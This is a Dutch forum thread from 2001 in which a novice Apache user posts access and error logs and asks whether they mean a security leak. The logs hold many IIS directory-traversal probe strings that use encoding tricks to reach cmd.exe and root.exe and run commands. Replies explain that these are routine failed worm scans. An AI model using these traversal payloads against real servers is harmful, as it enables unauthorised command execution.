[Apache2] hack pogingen??

xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:35 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:35 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:35 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:35 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:36 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:36 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:36 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:36 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:36 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:40 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:40 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 707
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:43 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 707
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:49 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780
xx.xxx.xxx.xxx - - [27/Nov/2001:21:29:49 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 780


Ik heb sinds een kort Apache 2 webserver draaien voor wat testing. Ik ben verder geheel leek op dit gebied.

Ik heb nu m'n access logs eens bekeken en staat helemaal vol met bovenstaand. Wat betekent het? Heb ik een security leak? Wat moet ik doen?

Alvast bedankt voor de moeite.

[Tue Nov 27 21:29:49 2001] [error] [client xx.xxx.xxx.xxx] File does not exist: C:/Program Files/Apache Group/Apache2/htdocs/scripts/..%5c/winnt/system32/cmd.exe
[Tue Nov 27 21:29:49 2001] [error] (32557)Socket is not connected: setsockopt(SO_UPDATE_ACCEPT_CONTEXT) failed.
[Tue Nov 27 21:29:49 2001] [error] [client xx.xxx.xxx.xxx] File does not exist: C:/Program Files/Apache Group/Apache2/htdocs/scripts/..%2f/winnt/system32/cmd.exe
[Tue Nov 27 22:03:31 2001] [error] (32557)Socket is not connected: setsockopt(SO_UPDATE_ACCEPT_CONTEXT) failed.
[Tue Nov 27 22:03:31 2001] [error] [client xx.xx.xxx.xx] File does not exist: C:/Program Files/Apache Group/Apache2/htdocs/scripts/root.exe
[Tue Nov 27 22:03:32 2001] [error] (32557)Socket is not connected: setsockopt(SO_UPDATE_ACCEPT_CONTEXT) failed.
[Tue Nov 27 22:03:32 2001] [error] [client xx.xx.xxx.xx] File does not exist: C:/Program Files/Apache Group/Apache2/htdocs/MSADC/root.exe
[Tue Nov 27 22:03:35 2001] [error] (32557)Socket is not connected: setsockopt(SO_UPDATE_ACCEPT_CONTEXT) failed.
[Tue Nov 27 22:03:35 2001] [error] [client xx.xx.xxx.xx] File does not exist: C:/Program Files/Apache Group/Apache2/htdocs/c/winnt/system32/cmd.exe



Ik gebruik Windows XP btw.

Op dinsdag 27 november 2001 22:07 schreef rb338 het volgende:
Zo te zien zijn het allemaal 404 replies.
Het zijn dus scans naar eventuele leaks, maar voor zover ik kan zien wordt er gescand op Windows software (.exe, duh ) en Frontpage rommel.

Niks om je druk over te maken dus, mijn server logs staan er ook dagelijks vol mee

jah dat had ik al gezien ja.
Weet jij hoe ik de server dichtzet voor extern verkeer?
Dus zodat alleen lokale IP's toegang hebben?

Op dinsdag 27 november 2001 22:07 schreef B-Top het volgende:
maaruh...verkeerde forum...

oops moest in het Advanced Networking & Servers
forum, sorry